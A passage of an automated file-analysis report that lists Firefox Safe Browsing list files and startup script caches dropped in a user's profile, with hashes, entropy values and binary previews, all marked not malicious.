SHA1:	4188442577FA77F25820D9B2D01CC446E30684AC
SHA-256:	4CBBD8CA5215B8D161AEC181A74B694F4E24B001D5B081DC0030ED797A8973E0
SHA-512:	6FCEE9A7B7A7B821D241C03C82377928BC6882E7A08C78A4221199BFA220CDC55212273018EE613317C8293BB8D1CE08D1E017508E94E06AB85A734C99C7CC34
Malicious:	false
Reputation:	low
Preview:	................

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/except-flashsubdoc-digest256.sbstore

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	304
Entropy (8bit):	4.70325744277424
Encrypted:	false
SSDEEP:	3:VUystlCwLLLLLLLLLLLPaueiydb1Vf/cMLkBR53B2mZ6C6duKZ/PfuSv+/rI4:e9MHk5xaCQuWGjI4
MD5:	BA0009932844173BC8F9AF264229DF24
SHA1:	C8F6956FA86F4E9CF71599B735E28860245AE4B5
SHA-256:	66D1C00C04D86E313E9A02775CDF906B1BE8D4CD6BEF423A1B9E21CC4E9F50C1
SHA-512:	582D7F28F41E6A7A5F882D15EC1F48D0BE57DC63E1A0D6E6A8BBD442A3AC27E38E0C3FDB3E1C30F416C41649391AFDE61F8079844B61A4995E0AB34D6CC8E745
Malicious:	false
Reputation:	low
Preview:	;.1...............................yZ....x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x.......#...).=..HZE.E.........9N..u3.....yZ..?\.I.u...Mk..<.......Ly......yZ.J...t...{.6w..y.m......Xj..yZ.w....m .U-.mCL.

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/mozplugin-block-digest256.pset

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	16
Entropy (8bit):	0.3372900666170139
Encrypted:	false
SSDEEP:	3:kl:s
MD5:	076933FF9904D1110D896E2C525E39E5
SHA1:	4188442577FA77F25820D9B2D01CC446E30684AC
SHA-256:	4CBBD8CA5215B8D161AEC181A74B694F4E24B001D5B081DC0030ED797A8973E0
SHA-512:	6FCEE9A7B7A7B821D241C03C82377928BC6882E7A08C78A4221199BFA220CDC55212273018EE613317C8293BB8D1CE08D1E017508E94E06AB85A734C99C7CC34
Malicious:	false
Reputation:	low
Preview:	................

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/mozplugin-block-digest256.sbstore

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	3580
Entropy (8bit):	7.671891447828382
Encrypted:	false
SSDEEP:	96:kvmXn/rUKZuGD5fR3TNQCTBl0VyCt9wrEZRg5n:kunoKpD553BQ3t9OEzun
MD5:	D6ACF2573E12AFDD7939568804D3FCC1
SHA1:	5C54AD3FF47C6B925E7AC17D361FE0FA60B9181E
SHA-256:	5525CBF8F8DC41D19AC632ED324E55293A510AE0EEBA16D0E3F33C707AA58A0C
SHA-512:	1F72C01AA332A6E3FC5F966ED2B12534653BCACF2DC242850877961CC4C16AC3BD1846939D56EA6E230A71F336F4B37F67E0070DDDB66D57BB51526DE52819CA
Malicious:	false
Reputation:	low
Preview:	;.1.....................^..........W....x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x.............p.....a.....J.B..gZ.........W....+.O..!l$...K...aP....C.5......W..;..t7p.'..qR..,....x..lP..Z...W.1.[.8..^...x.T)..}.Uj2.t..._.B...W.......1.f\|....;.m..i...........W.Q....";...'N..o>....UD..........W.Um..Uz"K...H`."e..\|...'...L...v...W.B...`..r{@...J.^....@r...B....W.}..A.......@..A.G.q...@.5.....W Iod}..zVD../xY..p..h.Z.`i&......W$HWYI.;.~..m.~..5....`.$.J.....W)w.\...t.'[!....#...G~]..CS>.@{...W$.u..%.H4....p\\|..v..)...........W4.8....g.iQE...t.....z.X....N.....W5Feb).<@3Z._..f...e.y.....u.....W6;.')..K.0.b9G.2.n........eP.d.....W6]Y1_A]xZM.L./ozM1S^.a.s....P.H...W77......Oc......g.R....d9F.9.sY...W8.....[.-..............@.?.......W9.R,.j<.G..{.<.,.8..hW.V"../....W<...#5../......@ij...8%0.gX..6...W?.......V..Z\.)..P...w.f...-...W@....c.m.I...G.q.H.R.E.. .

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/mozstd-trackwhite-digest256.pset

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	16
Entropy (8bit):	0.3372900666170139
Encrypted:	false
SSDEEP:	3:kl:s
MD5:	076933FF9904D1110D896E2C525E39E5
SHA1:	4188442577FA77F25820D9B2D01CC446E30684AC
SHA-256:	4CBBD8CA5215B8D161AEC181A74B694F4E24B001D5B081DC0030ED797A8973E0
SHA-512:	6FCEE9A7B7A7B821D241C03C82377928BC6882E7A08C78A4221199BFA220CDC55212273018EE613317C8293BB8D1CE08D1E017508E94E06AB85A734C99C7CC34
Malicious:	false
Reputation:	low
Preview:	................

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/mozstd-trackwhite-digest256.sbstore

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	333988
Entropy (8bit):	7.7734168827853685
Encrypted:	false
SSDEEP:	6144:Cl/mBoixkKBn/Hd+os1p8vuG3SI7AT6/GIUegPF+8wkyyXDvo7TYwTS:4/FiHBn/9+o9GG3SID+IUey+ryXDOTYr
MD5:	845BEDB718B8941F643BB988F640E141
SHA1:	DB9BC33A9C9FF6E6D3651710DC1AC8D387759D24
SHA-256:	5083D014CC7E8CFB15D4803429A9AB5FA397E1010CE66D0C8B8215C7FC3C6FDE
SHA-512:	96B64D39DC9B4E137D5BB93FD7EF18ABAB3D956C2819C1E569B5E9971AEC465B4EA084058F7F7C1B9012F52AC61189C6D3CF07AD47D2015D372754096FA03349
Malicious:	false
Reputation:	low
Preview:	;.1.....................8$.......-.\....x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x.............TV8.1..h@)..N.5.J..._.:BcT.-.\..a...'&.k.$..#.Y... -..W..(.-.\.".`....T..../[..A3..FI.rN<%N.".-.\.#<.k.+^5Q..k..jMY>.tj+.e....J.-.\.,.3b.E9ZC.j..N..l&3.XS.~b...B.-.\.-.s.vf^..9)#x<{.Y...<....z....-.\.?Yj...br4...........J.Z!......-.\.M...+.UJ.)..r..{.t.....f..B.-.\.R2."..'..k..9/z..`7d..#BmeN.j.-.\.T.........}i.<............y.-.\.U.6..."P'/.....J.....>j.E....O.-.\.b.&.-1.....7..[.UOS.W....=..R.-.\.m.#..,..D.&._^.jy.i...p.....hO.-.\.p...RrKJR.U..c"bG7.y.5..YU......-.\.t.L3..e...\.^.;2.......E...fB..-.\....a.):.;rk...U..P.....^..?.KV..-.\....'..>.$.B...3}...T.....E+.....-.\..H.K(.!.A.....(.....H...D..-.\...&q......Y.m4.D.'..S~..w.......-.\..(......7......h.5..P........4.-.\..=#.u@.9.-21.*.x....Gs....^.Ep.-.\..L..m.'..%.;..[.......z.DVn:.-.\.....8?.....h....q....!.j.

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-block-simple-1.sbstore

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	232
Entropy (8bit):	3.367009024331335
Encrypted:	false
SSDEEP:	3:VUystlMlklllCLLLLLLLLLLLVtFKAuB079M3Xs/phm:eksMFKy9M3XIQ
MD5:	E2CF527CA7550B7E7BDF7311E483A2C3
SHA1:	C354190BB2B8A00A6051EF2FB86E189AB053FE93
SHA-256:	F1E07B1D717433F47073DC54A7D98E3E87B3D0FA88E53466F93EA544AF885D11
SHA-512:	7A585735ABFB1292B9FC4709B797F09C6BE4DC90A133FBEDB14428AAE79C6DE5FAAE0B151758A75BF90566C98E5BD2A8201E738F321688180BC5B5814A97BB69
Malicious:	false
Reputation:	low
Preview:	;.1.....................................x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x.........`E.eK.zQ.....H..`T1l..............`.j..G1I...r..

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-block-simple.pset

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	28
Entropy (8bit):	0.37123232664087563
Encrypted:	false
SSDEEP:	3:klMl:sk
MD5:	E2CECF06A89B4A6D968486F17F30DA5D
SHA1:	46757A7F71DCFBEB5511665F123810148727324E
SHA-256:	E6B10FF8681FB7461557E6227D036617C7ECFC6E31A35412F8A5F72C217F318B
SHA-512:	5CFFECE9AF2B403AE150E8D2E755E7E3A71BDDED474293D846CD1A6231C1403261F4B5E6069A0A933738D5CC33F7EA8CC043C721594679E17FC5E8225F3F33C6
Malicious:	false
Reputation:	low
Preview:	............................

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-block-simple.sbstore

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	232
Entropy (8bit):	3.367009024331335
Encrypted:	false
SSDEEP:	3:VUystlMlklllCLLLLLLLLLLLVtFKAuB079M3Xs/phm:eksMFKy9M3XIQ
MD5:	E2CF527CA7550B7E7BDF7311E483A2C3
SHA1:	C354190BB2B8A00A6051EF2FB86E189AB053FE93
SHA-256:	F1E07B1D717433F47073DC54A7D98E3E87B3D0FA88E53466F93EA544AF885D11
SHA-512:	7A585735ABFB1292B9FC4709B797F09C6BE4DC90A133FBEDB14428AAE79C6DE5FAAE0B151758A75BF90566C98E5BD2A8201E738F321688180BC5B5814A97BB69
Malicious:	false
Reputation:	low
Preview:	;.1.....................................x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x.........`E.eK.zQ.....H..`T1l..............`.j..G1I...r..

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-harmful-simple-1.sbstore

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	232
Entropy (8bit):	3.3293711760593867
Encrypted:	false
SSDEEP:	3:VUystlMlklllCLLLLLLLLLLLaJPKcZrl3LcC5rY+HVl7sAVZwn:eksbQa3Lz5JPgAVen
MD5:	051FB32DECE757BA112AC36DC72E3A91
SHA1:	A30D26CEE0F69FA67BF9E60BA692F4831373CC07
SHA-256:	0806D98FB3DE55F75D7C0B17E26146567E08C483031526659A4A35D09B97EF19
SHA-512:	ADD2D3C503616070F056EA4E3A64FB54A2D8E75AF8FD5D9F1F8EE6B72A1D548FD4AB7D4A3256E4A6F4E1422631439DB62B251EE3F9D07B38A612AFF5E58936D5
Malicious:	false
Reputation:	low
Preview:	;.1.....................................x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........1.....}/9<...?.nyg....N}........<<.@....{..]{:p

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-harmful-simple.pset

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	28
Entropy (8bit):	0.37123232664087563
Encrypted:	false
SSDEEP:	3:klMl:sk
MD5:	E2CECF06A89B4A6D968486F17F30DA5D
SHA1:	46757A7F71DCFBEB5511665F123810148727324E
SHA-256:	E6B10FF8681FB7461557E6227D036617C7ECFC6E31A35412F8A5F72C217F318B
SHA-512:	5CFFECE9AF2B403AE150E8D2E755E7E3A71BDDED474293D846CD1A6231C1403261F4B5E6069A0A933738D5CC33F7EA8CC043C721594679E17FC5E8225F3F33C6
Malicious:	false
Reputation:	low
Preview:	............................

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-harmful-simple.sbstore

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	232
Entropy (8bit):	3.3293711760593867
Encrypted:	false
SSDEEP:	3:VUystlMlklllCLLLLLLLLLLLaJPKcZrl3LcC5rY+HVl7sAVZwn:eksbQa3Lz5JPgAVen
MD5:	051FB32DECE757BA112AC36DC72E3A91
SHA1:	A30D26CEE0F69FA67BF9E60BA692F4831373CC07
SHA-256:	0806D98FB3DE55F75D7C0B17E26146567E08C483031526659A4A35D09B97EF19
SHA-512:	ADD2D3C503616070F056EA4E3A64FB54A2D8E75AF8FD5D9F1F8EE6B72A1D548FD4AB7D4A3256E4A6F4E1422631439DB62B251EE3F9D07B38A612AFF5E58936D5
Malicious:	false
Reputation:	low
Preview:	;.1.....................................x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........1.....}/9<...?.nyg....N}........<<.@....{..]{:p

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-malware-simple-1.sbstore

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	232
Entropy (8bit):	3.3683561037768297
Encrypted:	false
SSDEEP:	3:VUystlMlklllCLLLLLLLLLLLJnawdSW+vmhnki/0Bn:eksSajWQji0
MD5:	3675254E341DF799D4307C1F59109185
SHA1:	8711844A41A4ACE77BA0A01A4D3AF2B2E59E6A75
SHA-256:	23D108134BED6099793F7DD6B8B6E62081EC3B945EFDBC7C5E0E779FD9B82F98
SHA-512:	9344CA1456E1E74A4DAC833E0AF55DB9730F8AB2954A855B4A775A938B2055C86EFF367F25BAE80F2FFEA45ACEBADE10A8347ADD18222E715620DD864F2D8E4F
Malicious:	false
Reputation:	low
Preview:	;.1.....................................x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x........B.WG..a..E.+`D8.....a. ...D...q......w...X.Z.Z...~.

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-malware-simple.pset

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	28
Entropy (8bit):	0.37123232664087563
Encrypted:	false
SSDEEP:	3:klMl:sk
MD5:	E2CECF06A89B4A6D968486F17F30DA5D
SHA1:	46757A7F71DCFBEB5511665F123810148727324E
SHA-256:	E6B10FF8681FB7461557E6227D036617C7ECFC6E31A35412F8A5F72C217F318B
SHA-512:	5CFFECE9AF2B403AE150E8D2E755E7E3A71BDDED474293D846CD1A6231C1403261F4B5E6069A0A933738D5CC33F7EA8CC043C721594679E17FC5E8225F3F33C6
Malicious:	false
Reputation:	low
Preview:	............................

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-malware-simple.sbstore

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	232
Entropy (8bit):	3.3683561037768297
Encrypted:	false
SSDEEP:	3:VUystlMlklllCLLLLLLLLLLLJnawdSW+vmhnki/0Bn:eksSajWQji0
MD5:	3675254E341DF799D4307C1F59109185
SHA1:	8711844A41A4ACE77BA0A01A4D3AF2B2E59E6A75
SHA-256:	23D108134BED6099793F7DD6B8B6E62081EC3B945EFDBC7C5E0E779FD9B82F98
SHA-512:	9344CA1456E1E74A4DAC833E0AF55DB9730F8AB2954A855B4A775A938B2055C86EFF367F25BAE80F2FFEA45ACEBADE10A8347ADD18222E715620DD864F2D8E4F
Malicious:	false
Reputation:	low
Preview:	;.1.....................................x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x........B.WG..a..E.+`D8.....a. ...D...q......w...X.Z.Z...~.

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-phish-simple-1.sbstore

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	232
Entropy (8bit):	3.302539208701039
Encrypted:	false
SSDEEP:	3:VUystlMlklllCLLLLLLLLLLLOW4xUO0f0iI8hE1R73sBKD:eks3pf+8RABy
MD5:	3D1CE5E50208F0CB3B979186043A548F
SHA1:	10C66032C5ACAC22D70670B9302437141E6371EF
SHA-256:	1E13D05D482C3D533DC6035AF2B2D6E84749412A5748D1435B70CEC8B312340B
SHA-512:	AE2F35C0549C26251053689C90CE831F0C5742D6F7C1DC13482560B02FB4A6029F107E472FCB26BF41B4E89E47559490F5DA049D5B51864A3C4C2C2AE3F588C2
Malicious:	false
Reputation:	low
Preview:	;.1.....................................x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x........Y.......j..}`A=F......c..5.......T...8\|..d.\|..{

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-phish-simple.pset

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	28
Entropy (8bit):	0.37123232664087563
Encrypted:	false
SSDEEP:	3:klMl:sk
MD5:	E2CECF06A89B4A6D968486F17F30DA5D
SHA1:	46757A7F71DCFBEB5511665F123810148727324E
SHA-256:	E6B10FF8681FB7461557E6227D036617C7ECFC6E31A35412F8A5F72C217F318B
SHA-512:	5CFFECE9AF2B403AE150E8D2E755E7E3A71BDDED474293D846CD1A6231C1403261F4B5E6069A0A933738D5CC33F7EA8CC043C721594679E17FC5E8225F3F33C6
Malicious:	false
Reputation:	low
Preview:	............................

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-phish-simple.sbstore

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	232
Entropy (8bit):	3.302539208701039
Encrypted:	false
SSDEEP:	3:VUystlMlklllCLLLLLLLLLLLOW4xUO0f0iI8hE1R73sBKD:eks3pf+8RABy
MD5:	3D1CE5E50208F0CB3B979186043A548F
SHA1:	10C66032C5ACAC22D70670B9302437141E6371EF
SHA-256:	1E13D05D482C3D533DC6035AF2B2D6E84749412A5748D1435B70CEC8B312340B
SHA-512:	AE2F35C0549C26251053689C90CE831F0C5742D6F7C1DC13482560B02FB4A6029F107E472FCB26BF41B4E89E47559490F5DA049D5B51864A3C4C2C2AE3F588C2
Malicious:	false
Reputation:	low
Preview:	;.1.....................................x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x........Y.......j..}`A=F......c..5.......T...8\|..d.\|..{

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-track-simple-1.sbstore

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	272
Entropy (8bit):	3.9834161156862735
Encrypted:	false
SSDEEP:	3:VUylllvl2lll1lCLLLLLLLLLLLQ0ZIn39lAN6r3Zzk9uYs/wPMuiC:rUiU3gNAigr/wMC
MD5:	95F28EDE25C301301F25FBBD9A3C56EC
SHA1:	80F7D95AFC0DE8C608F672A6837C664EF847BCD5
SHA-256:	87763DF78772F7D750B0FA5A31EEC23E931FD3BD1CBB33BEDDFC61889DA36478
SHA-512:	C6E09C76840DDEA559E243E5C13881CFBCDCC7B0C2163461FDCCE1F3F5110E2B0BB553DE447A4E1E0D5EDF516EEEE2FAD5EFC15C398E101EF3C81501E55320AF
Malicious:	false
Reputation:	low
Preview:	;.1.........................................x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x.......Ik...Xf2.h.J.^..P>.A.:..I%8]........=(K_..W..{...L.w...:7.&.PH..26....U.]..)..{6....(.

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-track-simple.pset

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	28
Entropy (8bit):	0.37123232664087563
Encrypted:	false
SSDEEP:	3:klMl:sk
MD5:	E2CECF06A89B4A6D968486F17F30DA5D
SHA1:	46757A7F71DCFBEB5511665F123810148727324E
SHA-256:	E6B10FF8681FB7461557E6227D036617C7ECFC6E31A35412F8A5F72C217F318B
SHA-512:	5CFFECE9AF2B403AE150E8D2E755E7E3A71BDDED474293D846CD1A6231C1403261F4B5E6069A0A933738D5CC33F7EA8CC043C721594679E17FC5E8225F3F33C6
Malicious:	false
Reputation:	low
Preview:	............................

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-track-simple.sbstore

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	272
Entropy (8bit):	3.9834161156862735
Encrypted:	false
SSDEEP:	3:VUylllvl2lll1lCLLLLLLLLLLLQ0ZIn39lAN6r3Zzk9uYs/wPMuiC:rUiU3gNAigr/wMC
MD5:	95F28EDE25C301301F25FBBD9A3C56EC
SHA1:	80F7D95AFC0DE8C608F672A6837C664EF847BCD5
SHA-256:	87763DF78772F7D750B0FA5A31EEC23E931FD3BD1CBB33BEDDFC61889DA36478
SHA-512:	C6E09C76840DDEA559E243E5C13881CFBCDCC7B0C2163461FDCCE1F3F5110E2B0BB553DE447A4E1E0D5EDF516EEEE2FAD5EFC15C398E101EF3C81501E55320AF
Malicious:	false
Reputation:	low
Preview:	;.1.........................................x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x.......Ik...Xf2.h.J.^..P>.A.:..I%8]........=(K_..W..{...L.w...:7.&.PH..26....U.]..)..{6....(.

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-trackwhite-simple-1.sbstore

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	232
Entropy (8bit):	3.4079994338327437
Encrypted:	false
SSDEEP:	3:VUystlMlklllCLLLLLLLLLLLYdIVDdSxcEtY4NL/n:eksdWdSxc3wn
MD5:	65E942614EEE70680464AC4BE75019FC
SHA1:	7CA1B5994684A7FE37A61BC350A1FA8A89BF91DA
SHA-256:	34395085DA32C8B4EFE9959E3B0D756B43FFED17694D66F39B966CD331BD9A94
SHA-512:	55B09573C235876D0CB4E6C20070CD1954CF1EB94F513A94985896237A350E48FCD47C88D5EC9632AB9D0AED4A59C250E69F59A59ED88F2A0AEB6734302744A9
Malicious:	false
Reputation:	low
Preview:	;.1.....................................x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x........=Q.IU`.G...>...u..X...7...k6.b....k:u.z*N._)8.EhnZ

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-trackwhite-simple.pset

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	28
Entropy (8bit):	0.37123232664087563
Encrypted:	false
SSDEEP:	3:klMl:sk
MD5:	E2CECF06A89B4A6D968486F17F30DA5D
SHA1:	46757A7F71DCFBEB5511665F123810148727324E
SHA-256:	E6B10FF8681FB7461557E6227D036617C7ECFC6E31A35412F8A5F72C217F318B
SHA-512:	5CFFECE9AF2B403AE150E8D2E755E7E3A71BDDED474293D846CD1A6231C1403261F4B5E6069A0A933738D5CC33F7EA8CC043C721594679E17FC5E8225F3F33C6
Malicious:	false
Reputation:	low
Preview:	............................

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-trackwhite-simple.sbstore

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	232
Entropy (8bit):	3.4079994338327437
Encrypted:	false
SSDEEP:	3:VUystlMlklllCLLLLLLLLLLLYdIVDdSxcEtY4NL/n:eksdWdSxc3wn
MD5:	65E942614EEE70680464AC4BE75019FC
SHA1:	7CA1B5994684A7FE37A61BC350A1FA8A89BF91DA
SHA-256:	34395085DA32C8B4EFE9959E3B0D756B43FFED17694D66F39B966CD331BD9A94
SHA-512:	55B09573C235876D0CB4E6C20070CD1954CF1EB94F513A94985896237A350E48FCD47C88D5EC9632AB9D0AED4A59C250E69F59A59ED88F2A0AEB6734302744A9
Malicious:	false
Reputation:	low
Preview:	;.1.....................................x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x........=Q.IU`.G...>...u..X...7...k6.b....k:u.z*N._)8.EhnZ

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-unwanted-simple-1.sbstore

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	232
Entropy (8bit):	3.367107760120435
Encrypted:	false
SSDEEP:	3:VUystlMlklllCLLLLLLLLLLLge3nZsRusljWFgm:eks5EsRRQB
MD5:	A5695CC64D77967232B0C1344C6E72B3
SHA1:	B0F151A5292D4B796668B242BF896FDBB5A24B67
SHA-256:	042A22B8681D754671D2018BA109B31A53EE3728D48C6379043F8E3394E7FBAD
SHA-512:	C09F56E91B41D01375C458A6CCC3FC0CEDC18696AEC5D7A2520C51905F4D9BC660F3AD28E69D64B3814AEB3279AFC686794C986F0FA6212463F3AAC850D40019
Malicious:	false
Reputation:	low
Preview:	;.1.....................................x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x.......^......R..U:N......LgY.u.l..H.Z....N?^c.d...].1. b

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-unwanted-simple.pset

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	28
Entropy (8bit):	0.37123232664087563
Encrypted:	false
SSDEEP:	3:klMl:sk
MD5:	E2CECF06A89B4A6D968486F17F30DA5D
SHA1:	46757A7F71DCFBEB5511665F123810148727324E
SHA-256:	E6B10FF8681FB7461557E6227D036617C7ECFC6E31A35412F8A5F72C217F318B
SHA-512:	5CFFECE9AF2B403AE150E8D2E755E7E3A71BDDED474293D846CD1A6231C1403261F4B5E6069A0A933738D5CC33F7EA8CC043C721594679E17FC5E8225F3F33C6
Malicious:	false
Reputation:	low
Preview:	............................

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-unwanted-simple.sbstore

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	232
Entropy (8bit):	3.367107760120435
Encrypted:	false
SSDEEP:	3:VUystlMlklllCLLLLLLLLLLLge3nZsRusljWFgm:eks5EsRRQB
MD5:	A5695CC64D77967232B0C1344C6E72B3
SHA1:	B0F151A5292D4B796668B242BF896FDBB5A24B67
SHA-256:	042A22B8681D754671D2018BA109B31A53EE3728D48C6379043F8E3394E7FBAD
SHA-512:	C09F56E91B41D01375C458A6CCC3FC0CEDC18696AEC5D7A2520C51905F4D9BC660F3AD28E69D64B3814AEB3279AFC686794C986F0FA6212463F3AAC850D40019
Malicious:	false
Reputation:	low
Preview:	;.1.....................................x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x.......^......R..U:N......LgY.u.l..H.Z....N?^c.d...].1. b

/home/james/.cache/mozilla/firefox/5zxot757.default/startupCache/scriptCache-child-new.bin

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	694466
Entropy (8bit):	4.848359591991629
Encrypted:	false
SSDEEP:	6144:d6FpPcHoaga/uaaKwIMhkVbJSyKiKNyQ/N5Iqrw7m:MPEgaG4VbAimN++
MD5:	75468BB62E89D19C56EF54A6902966D4
SHA1:	9FD009EC08C48E47BEF1873EC9F7E71FA2E93B0A
SHA-256:	C0D67C6F9412ABD1F9A10B7B0F748E6BC6A39F934152C51C0226868120E92B7A
SHA-512:	9478986033607B1D0915B77C3AEE21D8DC6D7A6EFBFD040A1278D8434D3121A4E7A83974AC3AAE21FCE182F426636867229F87BF35B733A5E2D5A3FC6DDE95B5
Malicious:	false
Reputation:	low
Preview:	mozXDRcachev002......chrome://global/content/process-content.js.chrome://global/content/process-content.js....."...'.resource:///modules/ContentObservers.js'.resource:///modules/ContentObservers.js.".......).resource://gre/modules/ExtensionUtils.jsm>.jsloader/non-syntactic/resource/gre/modules/ExtensionUtils.jsm.=...4...1.resource://gre/modules/ExtensionProcessScript.jsmF.jsloader/non-syntactic/resource/gre/modules/ExtensionProcessScript.jsmrr...M...).resource://gre/modules/MessageChannel.jsm>.jsloader/non-syntactic/resource/gre/modules/MessageChannel.jsmP.......*.resource://gre/modules/ExtensionCommon.jsm?.jsloader/non-syntactic/resource/gre/modules/ExtensionCommon.jsm.B.......".resource://gre/modules/Schemas.jsm7.jsloader/non-syntactic/resource/gre/modules/Schemas.jsm4...hM.....chrome://satchel/content/formSubmitListener.js..chrome://satchel/content/formSubmitListener.js.C...,.../.resource://gre/modules/PrivateBrowsingUtils.jsmD.jsloader/non-syntactic/resource/gre/modules/PrivateB

/home/james/.cache/mozilla/firefox/5zxot757.default/startupCache/scriptCache-new.bin

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	5077898
Entropy (8bit):	5.05715181457741
Encrypted:	false
SSDEEP:	24576:Oztjh4Tx/YdN1bG+AXkTrNhxOV4adInZ7yfQeMxpuB3aCU4cVQ6fya+oBxc:Oztj5N1yI3xOV7wAcpMyfya+ozc
MD5:	BA3ED0CBC8A88BEC3C86228EB0C1460A
SHA1:	E137A99E616D6AEBCC7364C95683DEA90EC8FB02
SHA-256:	140269DCC86D10A5D5CE95899C2403509585188B05345CCFEB3AC9181DC22C7A
SHA-512:	BAE5614AC4AB03C3655101A68DEF7B6BFBED5623583694402A89427B3BE2A9217CD3460B84D0A9646718F4041E3B1959169CF46EE0E3BFD511836EAAA77782C8
Malicious:	false
Reputation:	low
Preview:	mozXDRcachev002.nT..G.jar:file:///usr/lib/firefox/omni.ja!/components/MainProcessSingleton.jsF.jsloader/non-syntactic/resource/gre/components/MainProcessSingleton.js.........#.resource://gre/modules/Services.jsm8.jsloader/non-syntactic/resource/gre/modules/Services.jsm.....#...'.resource://gre/modules/AppConstants.jsm<.jsloader/non-syntactic/resource/gre/modules/AppConstants.jsm.4.......%.resource://gre/modules/XPCOMUtils.jsm:.jsloader/non-syntactic/resource/gre/modules/XPCOMUtils.jsm.E...X...1.resource://gre/modules/CustomElementsListener.jsmF.jsloader/non-syntactic/resource/gre/modules/CustomElementsListener.jsm.........A.jar:file:///usr/lib/firefox/omni.ja!/components/PushComponents.js@.jsloader/non-syntactic/resource/gre/components/PushComponents.jsf....n...H.jar:file:///usr/lib/firefox/browser/omni.ja!/components/nsBrowserGlue.js?.jsloader/non-syntactic/resource/app/components/nsBrowserGlue.jsh...,~...-.resource://gre/modules/ActorManagerParent.jsmB.jsloader/non-syntactic/resource

